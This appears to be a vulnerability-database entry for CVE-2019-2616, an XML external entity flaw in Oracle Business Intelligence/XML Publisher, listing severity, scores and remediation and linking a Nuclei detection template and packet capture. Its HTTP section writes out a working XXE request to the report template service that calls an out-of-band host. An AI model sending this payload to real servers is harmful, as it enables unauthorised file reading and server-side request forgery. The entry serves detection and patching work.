🔙 목록으로 돌아가기

CVE-2019-2616: Oracle Business Intelligence/XML Publisher - XML External Entity Injection

TitleOracle Business Intelligence/XML Publisher - XML External Entity Injection
Authorpdteam
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
RemediationApply the necessary patches or updates provided by Oracle to fix this vulnerability.
CVSS Score7.2
EPSS Score0.94278
CVE IDCVE-2019-2616
Tags cve cve2019 oracle xxe oast kev edb vkev vuln

🔍 Vulnerability Description

Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.

🌐 HTTP Request

POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 96
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://d5jpgdhle0o3c5046rgg6e7fm14jrc8hx.oast.site">

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-2616.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-2616.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A